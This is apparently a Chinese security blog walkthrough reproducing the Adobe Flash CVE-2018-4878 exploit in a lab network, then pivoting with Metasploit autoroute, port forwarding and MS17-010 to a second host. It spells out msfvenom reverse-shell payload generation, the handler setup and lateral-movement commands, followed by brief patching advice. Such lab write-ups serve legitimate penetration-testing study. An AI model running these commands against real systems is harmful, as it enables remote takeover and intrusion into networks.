1. 漏洞概述

   2018年2月1号，Adobe官方发布安全通报（APSA18-01），声明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。攻击者通过构造特殊的Flash链接，当用户用浏览器/邮件/Office访问此Flash链接时，会被“远程代码执行”，并且直接被getshell。直到2018年2月5号，Adboe才发布补丁来修复此0 day漏洞。

互联网上出现的基于此Flash 0day漏洞进行攻击的样本，其实在2017年底就已经由韩国计算机应急小组（KR-CERT）首次发现。

2. 相关知识介绍

    2.1 exp介绍

    EXP = Exploit的中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码，可以使得读者完全了解漏洞的机理以及利用的方法。

    2.2 metasploit介绍

    它是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程，团队合作。

3. 利用复现过程

3.1 内网环境搭建

虚拟机环境：

1)外网：
    攻击机：    系统：kali
            IP：192.168.28.136
2)内网：
    靶机1：系统：    Windows7x64       存在cve-2018-4878漏洞
            外IP：192.168.28.129        内IP 192.168.211.128
    靶机2：系统：    Windows Server 2003
            IP:192.168.211.129

Flash环境：

    靶机1（192.168.28.129 ）安装Adobe Flash 28.0.0.137版本

3.2 复现过程

    3.2.1 安装flash

    3.2.2 使用msfvenom生成shell代码

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.211.129 lport=8888 -f python>shellcode.txt

（其中lhost为kali的ip地址，lport为自定义的端口号）

    3.2.3 使用python编写利用程序 生成cve-2018-4878.py

cat shellcode.txt

 并将buf覆盖为msfvenom生成的代码shellcode.txt

且修改：

 3.2.4 在Kali Linux执行cve-2018-4878.py 生成两个文件

lspython cve-2018-4878.pyls -l

3.2.5 构建远程访问，配置apache2服务

开启apache2服务：

service apache2 start

将生成的两个文件放入/var/www/html目录中：

cp index2.html  /var/www/html/index2.htmlcp exploit.swf /var/www/html/exploit.swf

此时，Kali Linux上Web服务启动，并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面，则可以直接被控制。

3.2.6 kali 开启shell会话监听

先开启数据库服务：service postgresql start
数据库初始化：msfdb init
开启框架：msfconsole
使用handler监听模块：use exploit/multi/handler
回弹一个tcp连接：set payload windows/meterpreter/reverse_tcp
设置kali渗透机的ip地址：set lhost 192.168.28.136
设置监听端口，这个需跟上面msfvenom设置的端口一致：set lport 8888 
开启监听，等待肉鸡上线：exploit

此时靶机1访问kali的apache服务：在浏览器中输入http://192.168.28.136/index2.html   执行了带有flash漏洞利用的程序

Kali反弹shell：
ifconfig查看

getuid  得到id名
sysinfo  得到系统信息
ps:

3.3 对内网进行渗透

run get_local_subnets   本地子网查询run autoroute -s 192.168.211.0/24   添加去往目标内网网段的静态路由 run autoroute -p   路由查询

使用ms17_010模块 扫描内网中存在的该漏洞的内网机子：

background  退出meterpreteruse auxiliary/scanner/smb/smb_ms17_010  使用模块set rhosts 192.168.211.0/24set threads 50run

扫描结果 ip为192.168.211.129 存在“永恒之蓝”漏洞：

对该漏洞进行利用 攻击靶机2(ip:192.168.211.129)
首先进行端口转发：

Sessions 查看返回的会话名sessions 1 portfwd add -l 5555 -p 6666 -r 192.168.211.129 设置正向连接portfwd add -l 4445 -r 192.168.211.129 -p 445 端口转发use exploit/windows/smb/ms17_010_psexec  使用模块background

 设置攻击：

use exploit/windows/smb/ms17_010_psexec 使用模块set rhost 192.168.28.136set rport 445set payload windows/meterpreter/bind_tcpset lport 2222exploit

445端口不行，换成以下两个端口：

成功正向连接反弹shell：
getuid获得id名：

3. 防护方案

（1）直接到Adobe Flash官网，下载最新版本：https://get.adobe.com/cn/flashplayer/（2）安装常见杀毒软件，开启实时防护和杀毒引擎实时升级。

4. 参考文献

https://blog.51cto.com/chenxinjie/2093653https://www.cnblogs.com/backlion/p/9484949.html使用MSF路由转发实现MSF框架的内网渗透matesploit [内网穿刺] 端口转发https://www.cnblogs.com/diligenceday/p/11028462.html

往期精彩

登陆页面的检测及渗透

渗透实战篇（一）

渗透测试信息收集的方法

常见Web中间件漏洞利用及修复方法

内网渗透 | 流量转发场景测试

Waf从入门到Bypass

实战渗透-看我如何拿下学校的大屏幕

技术篇：bulldog水平垂直越权+命令执行+提权

渗透工具实战技巧大合集 | 先收藏点赞再转发一气呵成

感兴趣的可以点个关注！！！

原文始发于微信公众号（安全先师）：内网环境复现Flash漏洞